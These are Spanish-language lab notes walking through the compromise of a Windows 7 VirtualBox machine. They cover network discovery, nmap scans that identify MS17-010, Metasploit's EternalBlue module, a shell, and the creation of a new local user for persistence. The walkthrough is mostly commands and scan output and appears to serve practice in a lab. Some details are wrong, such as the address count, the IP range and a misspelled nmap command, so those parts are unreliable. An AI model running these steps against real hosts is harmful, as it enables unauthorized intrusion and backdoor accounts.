xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

PASOS PARA ENTRAR A UNA MAQUINA REMOTA DESDE KALLY LINUX , A MAQUINAS VULNERABLES DE LA MISMA RED 

1 ifconfig (veo la ip asignada,mascara subred y ip del broadcast)

Resultados:
mascara 255.255.255.0 = /24
binario: 1111111.1111111.1111111.0000000
cantidad de ip: 256
ip de red:
ip de broadcast:
cantidad de ip asignables: 256 direcciones
rango de ip: desde la 10.0.0.1 hasta la 1.0.0.254
ip de la maquina atacante (yo)= 10.0.0.206
ip de la maquina victima: ?
cantidad de maquinas activas: 23
cantidad de maquinas virtuales: 7
ip del router: 10.0.0.1

2 sudo namp -sn 10.0.0.0/24
Resultados:

cantidad de maquinas activas: 23
cantidad de maquinas virtuales: 7
ip del router: 10.0.0.1
ip de las maquinas virtuales:
10.0.0.172
10.0.0.176
10.0.0.179
10.0.0.180
10.0.0.181
10.0.0.206
10.0.0.207

3 ping -c 1 [ip-posibles-maquinas-virtuales-vulnerables]
Resultados:

ip de la maquina victima: 10.0.0.181

4 nmap -p- --open -sS -min-rate 5000 -vvv -n -Pn 10.0.0.181

Resultados:
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49158/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 08:00:27:BF:99:A9 (Oracle VirtualBox virtual NIC)
Service Info: Host: MICROCHOFT; OS: Windows; CPE: cpe:/o:microsoft:windows

PORT    STATE SERVICE      REASON
135/tcp open  msrpc        syn-ack ttl 128
139/tcp open  netbios-ssn  syn-ack ttl 128
445/tcp open  microsoft-ds syn-ack ttl 128
MAC Address: 08:00:27:BF:99:A9 (Oracle VirtualBox virtual NIC)
---------------------------------------------------------------
PORT      STATE SERVICE      REASON
135/tcp   open  msrpc        syn-ack ttl 128
139/tcp   open  netbios-ssn  syn-ack ttl 128
445/tcp   open  microsoft-ds syn-ack ttl 128
49158/tcp open  unknown      syn-ack ttl 128
MAC Address: 08:00:27:BF:99:A9 (Oracle VirtualBox virtual NIC)
---------------------------------------------------------------
5 Nmap -sCV -p 135,139,445,49158 10.0.0.181 -oN res-targeted

Resultados:

Host script results:
| smb-os-discovery:
|   OS: Windows 7 Home Basic 7601 Service Pack 1 (Windows 7 Home Basic 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|   Computer name: Microchoft
|   NetBIOS computer name: MICROCHOFT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2026-01-17T00:56:33+01:00
|_clock-skew: mean: -17h16m20s, deviation: 34m38s, median: -16h56m20s
| smb2-security-mode:
|   2.1:
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: MICROCHOFT, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:bf:99:a9 (Oracle VirtualBox virtual NIC)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2026-01-16T23:56:33
|_  start_date: 2026-01-16T22:02:20

6 nmap --script "vuln and safe" -p 445 10.0.0.181
 Resultados:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 08:00:27:BF:99:A9 (Oracle VirtualBox virtual NIC)

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|          
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

7 msfconsole -q

Resultado:
msf >

8 search eternalblue

   #   Name                                           Disclosure Date  Rank     Check  Description
   -   ----                                           ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1     \_ target: Automatic Target                  .                .        .      .
   2     \_ target: Windows 7                         .                .        .      .
   3     \_ target: Windows Embedded Standard 7       .                .        .      .
   4     \_ target: Windows Server 2008 R2            .                .        .      .
   5     \_ target: Windows 8                         .                .        .      .
   6     \_ target: Windows 8.1                       .                .        .      .
   7     \_ target: Windows Server 2012               .                .        .      .
   8     \_ target: Windows 10 Pro                    .                .        .      .
   9     \_ target: Windows 10 Enterprise Evaluation  .                .        .      .
   10  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   11    \_ target: Automatic                         .                .        .      .
   12    \_ target: PowerShell                        .                .        .      .
   13    \_ target: Native upload                     .                .        .      .
   14    \_ target: MOF upload                        .                .        .      .
   15    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   16    \_ AKA: ETERNALROMANCE                       .                .        .      .
   17    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   18    \_ AKA: ETERNALBLUE                          .                .        .      .
   19  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   20    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   21    \_ AKA: ETERNALROMANCE                       .                .        .      .
   22    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   23    \_ AKA: ETERNALBLUE                          .                .        .      .
   24  auxiliary/scanner/smb/smb_ms17_010             .                normal   No     MS17-010 SMB RCE Detection
   25    \_ AKA: DOUBLEPULSAR                         .                .        .      .
   26    \_ AKA: ETERNALBLUE                          .                .        .      .
   27  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
   28    \_ target: Execute payload (x64)             .                .        .      .
   29    \_ target: Neutralize implant                .                .        .      .


Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'

9 use 0

10 show options

11 set RHOST 10.0.0.181

12 exploit
13 shell

14 whoami

15 net user
16 net localgroup
17 ipconfig
18 net user (nombre) (contra) /add

